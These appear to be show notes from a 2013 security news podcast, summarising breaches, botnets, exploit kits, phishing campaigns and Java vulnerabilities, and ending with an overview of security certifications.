In this show: South Korean banks under attack, Remote Linux Wiper, Your web hosting account is getting hacked, EA's Origin game allows hackers to take control of your computer, Apple adds 2 factor authentication and much more.
In this show: US Government says that Cyber Crime is worse than Terrorism, Hacking Back, New exploit kit: Neutrino, Andromeda Botnet is back, Firefox OS, Bitcoin loses 25% because of a bug, Celebrity Credit Reports Stolen according to Equifax and Transunion, Colin Powell's facebook hacked and much more.
Cyberattacks are near the top of the list of most serious threats facing the U.S., with the rivaling concerns about terrorism and North Korea, intelligence officials with President Barack Obama's administration said.
"Increasingly, state and non-state actors are gaining and using cyberexpertise. These capabilities put all sectors of our country at risk, from government and private networks to critical infrastructures."
Clapper raised concerns about budget cuts forced under the congressional process called sequestration.
The 7 Highly Effective Habits of a Security Awareness Program
Create a Strong Foundation
(Have) Organizational Buy-in
(Encourage) Participative Learning
(Have) More Creative Endeavors
Partner with Key Departments
Be the Department of HOW
On Hacking Back and Going Offensive Legally
the information security professionals, should be the “Department of HOW” and not the “Department of NO”. We must focus on how to allow users to do what they want safely, not simply saying no to our own customers and further locking down systems
the need to establish dos and don’ts in company security policies, we should raise the bar and let security be a key part of solving business challenges, not an obstacle to it.
The Andromeda botnet – first spotted in late 2011 – has recently resurfaced
This threat arrives via a familiar means: spammed messages with malicious attachments or links to compromised websites hosting Blackhole Exploit Kit (BHEK) code
Andromeda itself is highly modular, and can incorporate various modules, such as:
SOCKS4 proxy module
The top affected countries of this threat are Australia, Turkey, and Germany The perpetrators behind Andromeda have improved the malware’s propagation routines to proliferate itself by dropping several component files, one of which creates the registry key containing an encrypted .DLL file for its propagation
we’re going to see more refinements in the tools or malware that attackers use
Although the security holes could, potentially, be exploited by a malicious hacker to hijack computers evidence hasn't yet been seen that these vulnerabilities are being exploited in real-world attacks
Limiting Web Browser plugins like Java and Flash can block attacks from commiting “Drive By” attacks
there is a relatively simple and effective alternative: Click-to-Play.
Click-to-Play is a feature built into both Google Chrome, Mozilla Firefox and Opera (and available via add-ons in Safari)
blocks plugin activity by default, replacing the plugin content on the page with a blank box. Users who wish to view the blocked content need only click the boxes to enable the Flash or Java content inside of them.
Getting a click-to-play like feature working in Microsoft‘s Internet Explorer seems to be a bit more complicated
these approaches can be used to block Java content from running by default
A side note, if you unplug Java from any of your browsers, Oracle’s Java installer re-enables the plug-in when the program is updated
hackers had managed to publish the credit reports and personal information of a number of public figures on a newly-created website.
Victims include celebrities such as Beyoncé Knowles, Ashton Kutcher, Paris Hilton and Britney Spears - as well as public figures such as US Vice President Joe Biden, Hillary Clinton and Michelle Obama.
According to Bloomberg, Equifax Inc and TransUnion Corp have confirmed that sensitive, personal-identifying information about celebrities and public figures has been taken from their systems.
Microsoft noted a change in the security update policy for several applications that it built and has deployed as part of its Windows 8 operating system
Patch Tuesday, the second Tuesday of every month, is a ritual moment in which Microsoft releases a slew of updates across its product lines; Windows, Windows Server, Office, and other applications are given patches in a single push, helping IT bosses handle the update process with some order
However, with Windows 8, Microsoft delivers a number of applications through its new Windows Store
The company has decided to follow what I call the pedestrian path, by simply releasing updates as they are ready
There is an exception to this, in that if a security bug affects software that would normally be fixed during Patch Tuesday, the update will go out to both at the same time. This limits the ability for hackers to note a fix in one piece of code, and exploit the same weakness in other software.
Yahoo Mail users have been seeing their accounts broken into for months. While Yahoo says it has plugged at least two separate security holes leading to accounts getting hijacked, it appears the problem persists.
First reported to Yahoo in Jan 2013 and the activity is still being report in Mar 2013
Attacks typically consist of Yahoo users receiving an email from a friend or colleague (and sometimes a completely unknown party) containing a link that if clicked on, results in the account being hijacked
The bit.ly URL that is included (we’re not linking it here for obvious reasons) redirects to a fake MSNBC page that reportedly hijacks your Yahoo Mail account immediately if you are logged in.
Compromised accounts are being locked out. Phone numbers are posted to a fake page where the are scammers attempting to get a ransom payment in exchange for an account they have compromised.
Potential targets are not only grabbed from your contacts list but from your “Sent” and “Inbox”
On January 7, a lone hacker by the name of Shahin Ramezany uploaded a video to YouTube demonstrating how to compromise a Yahoo account by leveraging a DOM-based cross-site scripting (XSS) vulnerability exploitable in all major browsers. The same day, Yahoo got back to TNW with two statements, first saying it was investigating and secondly confirming it fixed the flaw.
On January 11, Yahoo issued a third statement to TNW: “The cross-site scripting vulnerability that we identified on Friday was fixed the same day. We can confirm that we’ve now fixed the vulnerability on all versions of the site.”
On January 28 and January 30, two Yahoo users contacted TNW to say their account was compromised via what they believed was the same way that was described in our previous articles.
On February 25, February 27, March 1, and March 4 we received more emails from Yahoo users saying their accounts had been compromised.
reiterated its previous stance. “The XSS flaws reported to Yahoo! have been fixed and we continue to aggressively investigate reports of any email accounts exhibiting anomalous behavior,” a Yahoo spokesperson told TNW. “We’re committed to protecting our users and their data. We strongly urge our users to change their passwords frequently and to use unique, alphanumeric passwords for each online site they visit
They were dubbed the Comment Crew due to their use of HTML comments to hide communication to the command-and-control servers.
The initial compromise occurs through a spear phishing email sent to the target. The email contains an attachment using a theme relevant to the target. Some recent examples used by this group and blocked by Symantec technologies are listed here:
U.S. Stocks Reverse Loss as Consumer Staples, Energy Gain.zip
New contact sheet of the AN-UYQ-100 contractors.pdf
U.S. Department of Commerce Preliminarily Determines Chinese and Vietnamese Illegally Dumped Wind Towers in the United States.doc
Chinese Oil Executive Learning From Experience.doc
My Eight-year In Bank Of America.pdf
Targets include Finance, Information Technology, Aerospace, Energy, Telecommunications, Manufacturing, Transportation, Media, and Public Services
Security firm Mandiant has published an unusually detailed report documenting China-sponsored hacking intrusions that have siphoned terabytes of sensitive data from 141 organizations over the past seven years.
latest report to lay a battery of computer intrusions at the feet at hackers linked to China's government
many of those claims lacked crucial details, opening them up to skeptics who complained that the lack of specificity made it difficult or impossible to conclude Chinese actors were behind attacks targeting US governmental agencies, corporations, and human rights organizations.
The Mandiant report is largely a response to these critics.
It identifies a 12-story white office tower on the outskirts of Shanghai as the nerve center for a hacking group long known to security researchers as the "Comment Crew."
The tower also happens to be the headquarters for the People Liberation Army's Unit 61398, which was described in 2011 as the "premier entity targeting the United States and Canada, most likely focusing on political, economic, and military-related intelligence" by the Virginia-based nongovernmental organization known as the Project 2049 Institute.
Many of the claims in the Mandiant report have been independently confirmed by US intelligence officials, according to an article published by The New York Times.
According to Mandiant, Comment Crew has for years vacuumed up the proprietary secrets of more than 100 targets, including technology blueprints, manufacturing processes, clinical trial results, pricing documents, and negotiation strategies.
Of more concern, Comment Crew hackers have most recently tuned their focus to computer systems used to control dams, gasoline refineries, and other critical infrastructure.
Chinese Hackers Blamed for Intrusion at Energy Industry Giant Telvent
In letters sent to customers last week, Telvent Canada Ltd. said that on Sept. 10, 2012 it learned of a breach of its internal firewall and security systems. Telvent said the attacker(s) installed malicious software and stole project files related to one of its core offerings —OASyS SCADA — a product that helps energy firms mesh older IT assets with more advanced “smart grid” technologies.
The firm said it was still investigating the incident, but that as a precautionary measure, it had disconnected the usual data links between clients and affected portions of its internal networks.
Joe Stewart, director of malware research at Dell SecureWorks and an expert on targeted attacks, said the Web site and malware names cited in the Telvent report map back to a Chinese hacking team known as the “Comment Group.”
Executive Order -- Improving Critical Infrastructure Cybersecurity
iphonedevsdk.com, could still be hosting exploit attacks
The java "zero-day" exploit allowed the attackers to install a collection of malware on the Java-enabled computers of those who visited the site
Site is still infected, do not visit
iphonedevsdk.com is an example of a "watering hole" attack.
These attacks compromise a site popular with a population of desired hacking victims, using security vulnerabilities to install code on the Web server hosting it, which injects attacks into the HTML sent to its visitors.
The exploit was the source of the attack on Twitter that led to the theft of Twitter usernames and passwords, according to a source familiar with the attack, and was used to infect computers belonging to Apple engineers.
Mobile developers who have used the forum in the last few months should check their systems for signs of malware.
A Christmas Eve cyberattack against the Web site of a regional California financial institution helped to distract bank officials from an online account takeover against one of its clients, netting thieves more than $900,000.
At approximately midday on December 24, 2012, organized cyber crooks began moving money out of corporate accounts belonging to Ascent Builders, a construction firm based in Sacramento, Calif. In short order, the company’s financial institution – San Francisco-based Bank of the West — came under a large distributed denial of service (DDoS) attack, a digital assault which disables a targeted site using a flood of junk traffic from compromised PCs.
KrebsOnSecurity contacted Ascent Builders on the morning of Dec. 26 to inform them of the theft, after interviewing one of the money mules used in the scam. Money mules are individuals who are willingly or unwittingly recruited to help the fraudsters launder stolen money and transfer the funds abroad. The mule in this case had been hired through a work-at-home job offer after posting her resume to a job search site, and said she suspected that she’d been conned into helping fraudsters.
Mark Shope, president of Ascent Builders, said that when the company’s controller originally went online on the morning of Dec. 24 to check the firm’s accounts, her browser wouldn’t let her access the bank’s page. She didn’t know it at the time, but her computer was being remotely controlled by the attackers’ malware, which blocked her from visiting the bank’s site.
The money mule was just one of 62 such individuals in the United States recruited to haul the loot stolen from Ascent. Most of the mules in this case were sent transfers of between $4,000 and $9,000, but several of them had bank accounts tied to businesses, to which the crooks wired huge transfers from Ascent’s account; five of the fraudulent transfers were for amounts ranging from $80,000 to $100,000.
Not long after putting through a batch of fraudulent automated clearing house (ACH) and wire transfers from Ascent’s accounts, the fraudsters initiated a DDoS attack against the bank’s Web site, effectively knocking it offline.
It’s not clear what tactics or botnets may have been used in the DDoS attack, but the cyberheist+DDoS approach matches the profile of cybercrime gangs using the Gameover Trojan – a ZeuS Trojan variant that has been tied to numerous DDoS attacks initiated to distract attention from high-dollar cyberheists.
Facebook officials said they recently discovered that computers belonging to several of its engineers had been hacked using a zero-day Java attack that installed a collection of previously unseen malware.
the attack did not expose customer data, and it was contained to the laptops of a small number of Facebook engineers.
The attack was discovered when a suspicious domain was detected in Facebook's Domain Name Service request logs.
First it was do-it-yourself malware and phishing toolkits, then it was specialized sites selling stolen FTP credentials and credit card accounts, and now its the next phase in cybercrime: crimeware as a service.
cybercriminal organizations set up shop as service providers to other bad guys, offering them online, point and click criminal software as a service -- often with customer service guarantees.
With relatively less effort, they can get more money. Instead of collecting data and trying to sell it, which takes more time, they build a platform to do that, and can reach a wider audience that would like to commit these crimes.
This lets other criminals who dont want to install and update their own software or run their own malicious servers get their stolen information via a Web-based service that does the dirty work for them.
The operators of these services typically operate in small groups of five to eight people in the U.S., Netherlands, Germany, Russia, and China, he says. The servers are hosted in Asia -- in China and Malaysia."
Cyber espionage campaign against the Uyghur community, targeting MacOSX systems
Ransomware is a nasty scam that infiltrates your computer and tricks you into thinking that you’ve done something wrong.
Police ransomware in particular informs users that they need to pay their local police a fine.
The apparent arrest of this cybercriminal of Russian origin occured in Dubai, United Arab Emirates.
The law enforcement authorities are working to extradite him to Spain for prosecution. Along with his arrest, the operation included the arrests of 10 other individuals tied to the money laundering component of the gang’s operations, which managed the monetization of the PaySafeCard/UKash vouchers received as payment in the scam.
The gang apparently had a branch in Spain that exchanged these vouchers and converted them into actual money, which would then be transferred to the leaders of the gang in Russia.
- Oracle today pushed out the third update in less than a month to fix critical vulnerabilities in its Java software - What makes Java vulnerabilities so dangerous is that Java is a cross-platform product, meaning exploits against vulnerabilities in Java can be used to deliver malicious payloads to Mac and Linux systems just the same as they can Windows PCs. - Java is a corporate product that somehow landed on something like 80 percent of consumer systems. - This is a buggy program that seems to produce a reliable stream of zero-day exploit opportunities for malware writers. So, if you don’t need it, junk it. - Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java
Evernote Forces Password Reset for 50M Users
http://www.h-online.com/security/news/item/Vulnerabilities-served-up-1810524.html - Online note-syncing service Evernote is forcing all of its 50 million users to reset their passwords after detecting suspicious activity on its network. - Evernote said digital intruders gained accessed to customer usernames, email addresses and encrypted passwords - The company says it has found no evidence that any of the content that users store in Evernote was accessed, changed or lost, and that there is no indication payment information for Evernote Premium or Business customers was accessed. - now is a great time to review your password practices. At the top of the password no-no’s list is reusing your email password at any other site.
Fake Mandiant APT Report Used as Malware Lure
http://isc.sans.edu/diary/Fake+Mandiant+APT+Report+Used+as+Malware+Lure/15226 - attackers are circulating malicious versions of the PDF document. - The fake report was distributed as an email attachment named Mandiant.pdf - according to Symantec and targeted the CVE-2013-0641 vulnerability in Adobe Reader and Acrobat
The Security Risks of Compromised Digital Certificates
http://blog.trendmicro.com/trendlabs-security-intelligence/the-security-risks-of-compromised-digital-certificates/ - Last week, Trend Micro found malware samples that had been signed with digital certificates belonging to two software companies that develop specialized software. - Since the two digital certificates are used by developers making very specialized products, this can increase the chances that this attack will succeed. - Both attacks used Java exploits to get onto the affected systems - This allows different types of malware to be launched into the memory of infected system without actually dropping the physical malware file - Using a valid digital certificate can trick the target system and even security software into thinking that the running program came from a legitimate source. We have reported on similar incidents involving signed malware in the past
Understanding Targeted Attacks: How do we defend our selves
- Part of identifying the network is also having a deep understanding of it, specifically the operations, processes, events, and behavior we consider normal. Knowledge of what is truly normal and what is not will help identify anomalies better and faster. - Defence with inside out protection, defence with depth - The better attitude to take is to assume that an attack is already inside the network, as this will force us to rethink the way we are currently protecting it.
http://blog.trendmicro.com/trendlabs-security-intelligence/mitigating-targeted-attacks-requires-an-integrated-solution/ • we’ve talked a lot Advanced Persistent Threats (APT), and how such threats require a different class of protection in order to be managed effectively. • recent work from ISACA on the 2012 Advanced Persistent Threat (APT) Awareness Study shows 63% of security professionals said they were or could be a target for APT attacks • most notably that a number of organizations are still focusing resources in the wrong direction to protect against APT attacks. • Enterprises need to understand the nature of APTs to better protect their networks against APTs
From Alarming to Familiar: Different Social Engineering Techniques
http://blog.trendmicro.com/trendlabs-security-intelligence/from-alarming-to-familiar-different-social-engineering-techniques/ • There are also other techniques that use different, more sober approach. • These techniques do not aim to trigger alarm, but instead to try to avoid it. They try to blend into their intended victims’ normal behavior or use their interests in order to get the them into schemes. • And though these techniques are far less alarming in terms of the message they bring, they are harder to detect, and often more sinister. • An example of this is the watering hole technique, which was used recently in an attack that ended up affecting companies such as Facebook and Apple.
Ichitaro Vulnerability: Another Zero-Day Exploit in the Wild
• http://www.symantec.com/connect/blogs/ichitaro-vulnerability-another-zero-day-exploit-wild • Symatec reports seeing this exploit since mid Jan • Specific to Japan • especially for those using the Japanese word processor software, Ichitaro.
https://blog.bit9.com/2013/02/25/bit9-security-incident-update/ - Bit9 continues to believe the attack against Bit9 was part of a larger campaign to infiltrate select US organizations in a very narrow market space - We continue to believe the scope of the attack remained the landing point from the SQL injection attack and the virtual system containing the certificate. The surrounding systems were protected by Bit9 which limited lateral movement for the attackers
Punkspider enumerates web application vulnerabilities
- Punkspider" runs essentially a vulnerabiliy scan on random web sites.
- 75% of mobile phishing URLs were rogue versions of well-known banking or financial sites. Once users are tricked into divulging their login credentials to these sites, cybercriminals can use these stolen data to initiate unauthorized transactions and purchases via the victim’s account. • For 2012, we found 4,000 phishing URLs designed for mobile Web • Then there’s the issue of users’ attitude towards mobile devices. It’s easy for users to dismiss these devices as simple devices that has no major security implications
Microsoft admits it was also hit by hackers, malware infects their Mac business unit
http://nakedsecurity.sophos.com/2013/02/23/microsoft-malware-attack/ • Microsoft published a statement on its security blog revealing that it was joining the growing list of well-known companies who had suffered at the hands of hackers. • Microsoft says that a "small number of computers", including some in the company's Mac business unit, were infected by malware. • the attack is similar to those which impacted the likes of Facebook and Apple, then a key part of the attack was the exploitation of a Java browser plug-in vulnerability.
http://blog.trendmicro.com/trendlabs-security-intelligence/why-is-the-watering-hole-technique-effective/ • See as early as 2009 • Old but new • No Lures needed ◦ Compromise a site ◦ Have a vulnerability to exploit ◦ Develop malware
In Security Decoded this week we cover the news and there is a lot of it:
Hacker announces the Zombie Apocalypse is here over the Emergency Broadcast System * Facebook had a Zero Day * Multiple US Government agencies we hacked * Zeus is showing up in Japan * Your heating and elevator controls could be easily hacked * A new RAT called Frutas * More Java, Flash, PDF and Microsoft vulnerabilities announced * The PCI Special Intrest Group releases guidance around Cloud Computing * And much more news. And we talk in details about security certifications.
Hacked Emergency broadcast announces Zombie Apocalypse is here
Viewers in Montana who were no doubt already on the edge of their seats waiting for the results of "teen cheaters take lie detectors" were suddenly confronted with a bigger calamity on Monday. The CW station of KRTV was interrupted by an emergency alert for a zombie apocalypse. Viewers were told that "the bodies of the dead are rising from their graves and attacking the living" in several Montana counties. KRTV confirmed someone had hacked into their emergency alert system and "there is no emergency."
Fed says internal site breached by hackers, no critical functions affected - Anonymous attack on US Government
Personal information on several hundred employees was compromised
There are indications the attackers had other motives, possibly including plans to gain future access to classified and other sensitive information.
No classified information was compromised in the cyber attack
The source or identity of the cyber attacker is not known, according to U.S. officials and outside security analysts. However, Chinese hackers are likely suspects because the department is known to be a major target of China for both secrets and technology.
The relative sophistication of the cyber attack is an indication of nation-state involvement.
A total of 14 computer servers and 20 workstations at the headquarters were penetrated during the attack.
'Cyber-attack' strikes govt again / Foreign Ministry says classified documents possibly stolen from computer
At least 20 internal documents, including confidential items, may have been stolen from the Foreign Ministry via an official computer in an apparent cyber-attack, it has been learned.
The ministry said Tuesday it had examined only one computer so far, and it would examine other computers to determine whether they were not infected with malware.
The cyber-attack followed the recent revelation at the Agriculture, Forestry and Fisheries Ministry that more than 3,000 pieces of information, including highly confidential documents, are suspected to have been stolen via unauthorized access to its computers.
According to the Foreign Ministry, it was notified by the National Information Security Center (NISC) on Jan. 28 that a computer at the ministry had possibly been the victim of unauthorized access. The ministry conducted an investigation and verified one of its computers had unauthorized communications with an external server.
The documents believed stolen include conference materials that could be considered class-2 information in terms of confidentiality according to the government's standard classification.
Hackers of the Turkish Ajan group have breached Nokia Taiwan’s official website (nokia.com.tw). They defaced four subdomains andleaked files that, according to the hackers, contain around 100,000 records, including user details.
The affected subdomains are member.nokia.com.tw, event.nokia.com.tw, fun.nokia.com.tw, and swipe.nokia.com.tw.
It’s difficult to determine precisely how many users are affected by the breach. However, the Nokia610_Users file contains the names, email addresses,phone numbers, and IMEIs of 440 customers.
One of the larger files, NKA073_User, contains the details of close to 20,000 users. The names,mobile phone numbers and email addresses of over 25,000 customers are stored in another file named Event_N97_User.
An analysis of the incident revealed that an exploit had been planted on our servers possibly as early as July 25 2012, which allowed arbitrary execution of code under the user running theMoinMoin wiki.
It is likely that the password information was downloaded from the server in the course of the security breach, so we recommend changing your passwords immediately, if you have used the same password for other services as well.
We’re going to blow up your boiler: Critical bug threatens hospital systems
file that was there was done out of process and without verification
“red team” stood up
Exploit was used on Engineer’s laptop (the undisclosed software was then made aware of the zero-day used by Facebook in their test)
Did not sound the test alarm until the team was underway
everything was a test to see how they handled a security situation
Use this quote, it is a good reference to Episode 1 in our predictions where we state CyberSecurity is falling behind and needs to close the gap, "Internet security is so flawed," Facebook Chief Security Officer Joe Sullivan told Ars. "I hate to say it, but it seems everyone is in this constant losing battle if you read the headlines. We don't want to be part of those bad headlines.
Recently Analyst at Trend Micro completed their analysis of a new Exploit Kit, Whitehole
Whitehole is just a randomly selected name to help differentiate it from the Blackhole Exploit Kit
The new kit leverages existing JAVA vulnerabilites: 1-2011, 3-2012, and 1-2013
The new kit is currently being used in the following malware:
BKDR_Zaccess - known as a bootkit malware other this has the ability to download other malware or push fake applications like FakeAV
TROJ_Ransom - Known as Ransomeware, typically locks systems until users are force to pay a sum of money . This malware is rapidy active in the wld and evolving at a fast pace We have seen this in the form of “FBI” notifications of illegal web activity.
Whitehole is still in a Beta Testing mode but developers are currently seeling the kit ranging from 200-1800 USD
At a time when JAVA has come under the microscope for it’s multiple vulnerabilities and companies like Apple and Mozilla urges users to update to the most current version of JAVA, YAHOO is still offering an application based on a 2008 version of JAVA
Sitebuilder - is a free tool that is designed to make building a website as simple as point and click. Sitebuild requires JAVA to function.
Yahoo bunbles this application with Java 6 Update 7. It has not been cleared if this is an oversite or if SiteBuilder can function with recent versions of JAVA
Latest Java 6 is release 39
One final note about SiteBuilder: Building your site with this tool may not only be hazardous to the security of your PC, it may also make it harder for your site to get the recognition it deserves. A bit of searching on this tool turned up some less than flattering resultssuggesting that sites built with SiteBuilder do not support an important type of Web site search optimization called “canonicalization.”
Phishers love to arouse curiosity and/or fear in the user’s mind and this stimulus can compel people to set aside all caution as well as any safety measures they might have in place
users are advised to confirm a pending transaction with their bank and also told that there is a copy of a bank slip attached
If the HTML attachment is opened, users are shown an image of a payment order. It is interesting to note that this image is very faint and very difficult to read. Using the HTML tag HTTP-EQUIV "REFRESH", this image disappears after four seconds. This display of the receipt for a small time period is an attempt to arouse enough interest in the user so that they will venture further into the trap.
The page refreshes after four seconds and a popup appears that states that the user has been signed out of their email account and needs to sign in again to view the bank slip.
On clicking the only optional button, users are shown a website that resembles a well-known bank login page. If users input their bank credentials or their email address on this page, their information is sent to the scammers and may be used for nefarious purposes.
Phishing: The Easy Way to Compromise Twitter Accounts
If the link is clicked, the browser is directed to a page that informs the user that they need to sign-in to their account to proceed. The page looks like it belongs to Twitter but it is actually a phishing page hosted on a server prepared by the attacker.
No matter what is entered into the login fields, correct or incorrect credentials, the user will appear back in their session.
Looks just like twitter
However, another fake page informs the user that the page they were attempting to visit does not exist. The page then redirects back to the legitimate Twitter page and the user is unaware of anything malicious having taken place.
in the last two years, more than eight million computers have been attacked by Bamital
Microsoft and Symantec teaming up
Microsoft convinced a judge at the U.S. District Court for the Eastern District of Virginia to give it control over the infrastructure that Bamital used to coordinate the search hijacking activities of host PCs
A webpage will be displayed to users are infected with Bamital
NetSeer suffers hack, triggers Google malware warnings
Public cloud environments are usually designed to allow access from anywhere on the Internet.
Perimeter boundaries between client environments can be fluid.
Clients may have limited or no oversight or control over cardholder data storage. Organizations might not know where cardholder data is physically stored, or the location(s) can regularly change. For redundancy or high availability reasons, data could be stored in multiple locations at any given time.
It can be challenging to verify who has access to cardholder data processed, transmitted, or stored in the cloud environment.
X10. Because X10 devices use 4-bit ID numbers, it is vulnerable to brute-force attacks. Furthermore, because it can be turned off with just one command, a thief can turn-off an X10-based alarm and infiltrate a victim’s house.
Z-Wave. By using tools readily available on the Internet, an attacker can sniff all traffic that flows in WPAN. With this information, an attacker can monitor a user’s day-to-day activities and gain information on the kind of devices used at home and how these are controlled. More tech-savvy thieves can even execute random commands via WPAN.
ZigBee. Though ZigBee-based devices have a more secured communication, problems still exist in the gateway between WPAN and an IP network. An attacker can bypass ZigBee authentication due to user’s weak password or misconﬁguration, allowing him to access devices like security cameras. With this, an attacker can monitor user’s daily activities and change gateway conﬁguration to connect to a fake Domain Name System (DNS) or proxy server, that may lead to data theft.
By stealing the keys the malware was able to take advantage of their “Application Whitelisting”
Virtually allowing all digitally signed applications to run on a customer’s network
"Due to an operational oversight within Bit9, we failed to install our own product on a handful of computers within our network,"
Keys not stored in a secure location
Certs have been revoked
There is no indication that the company’s Whitelisting products have been compromised
This parallels the 2011 RSA breach where customers were compromised through a theft of confidential data.
Original question came from Christian Fellows of Eugene AR
Basically 2 tracks: Management and Technical, Some cross over but not strong in both
Product Specific Certifications
Certified Information Systems Security Professional(CISSP)
10 domains of security
Access Control – a collection of mechanisms that work together to create security architecture to protect the assets of the information system.
Telecommunications and Network Security – discusses network structures, transmission methods, transport formats and security measures used to provide availability, integrity and confidentiality.
Network architecture and design
Information Security Governance and Risk Management – the identification of an organization’s information assets and the development, documentation and implementation of policies, standards, procedures and guidelines.
Security governance and policy
Contractual agreements and procurement processes
Risk management concepts
Security education, training and awareness
Certification and accreditation
Software Development Security – refers to the controls that are included within systems and applications software and the steps used in their development.
Systems development life cycle (SDLC)
Application environment and security controls
Effectiveness of application security
Cryptography – the principles, means and methods of disguising information to ensure its integrity, confidentiality and authenticity.
Public Key Infrastructure (PKI)
Information hiding alternatives
Security Architecture and Design – contains the concepts, principles, structures and standards used to design, implement, monitor, and secure, operating systems, equipment, networks, applications, and those controls used to enforce various levels of confidentiality, integrity and availability.
Fundamental concepts of security models
Capabilities of information systems (e.g. memory protection, virtualization)
Vulnerabilities and threats (e.g. cloud computing, aggregation, data flow control)
Operations Security – used to identify the controls over hardware, media and the operators with access privileges to any of these resources.
Attack prevention and response
Patch and vulnerability management
Business Continuity and Disaster Recovery Planning – addresses the preservation of the business in the face of major disruptions to normal business operations.
Business impact analysis
Disaster recovery process
Legal, Regulations, Investigations and Compliance – addresses computer crime laws and regulations; the investigative measures and techniques which can be used to determine if a crime has been committed and methods to gather evidence.
Physical (Environmental) Security – addresses the threats, vulnerabilities and countermeasures that can be utilized to physically protect an enterprise’s resources and sensitive information.
Site/facility design considerations
Security+ - CompTIA
Network Security (21% of exam)
Compliance and Operational Security (18%)
Threats and Vulnerabilities (21%)
Application, Data and Host Security (16%)
Access Control and Identity Management (13%)
Certified Information Security Manager (CISM) - ISACA
Information Security Governance
Information Security Steering Group
Legal and regulatory issues
Information Security Process Improvement
Recovery Time Objectives
Collecting and presenting evidence
Cost Benefit Analysis
Privacy and Tax laws
Certified Information Security Auditor (CISA) - ISACA
SACA IS Auditing Standards, Guidelines and Procedures and Code of Professional Ethics
Control objectives and controls related to IS
Procedures used to store, retrieve, transport, and dispose of confidential information assets
Control Self-Assessment (CSA)
IS auditing practices and techniques
IT governance frameworks
Quality management strategies and policies
Risk management methodologies and tools
Use of control frameworks (e.g., CobiT, COSO, ISO 17799)
Practices for monitoring and reporting of IT performance
Benefits management practices for CISA Certification
Processes for managing emergency changes to the production systems
Certified in Risk and Information Control (CRISC - “see-risk”) - ISACA
Risk Identification Assessment and Evaluation (RI)
Risk Response (RR)
Risk Monitoring (RM)
IS Control Design and Implementation (CD)
IS Control Monitoring and Maintenance (MM)
Certified in the Governance of Enterprise IT (CGEIT) - ISACA
For experienced IT governance personnel.
Certified Ethical Hacker (CEH) - EC-Council
Required for admin at US Govt
Penetration testing methodologies
Stealthy network recon
Passive traffic identification
Remote root vulnerability exploitation
Privilege escalation hacking
Remote access trojan hacking
Running shellcode in RAM vs. on disk
Breaking IP-based ACLs via spoofing
Abusing Windows Named Pipes for Domain Impersonation
Evidence removal and anti-forensics
Attacking network infrastructure devices
Hacking by brute forcing remotely
Hiding exploit payloads in jpeg and gif image files
Hacking Web Applications
Breaking into databases with SQL Injection
Cross Site Scripting hacking
Hacking into Cisco routers
Justifying a penetration test to management & customers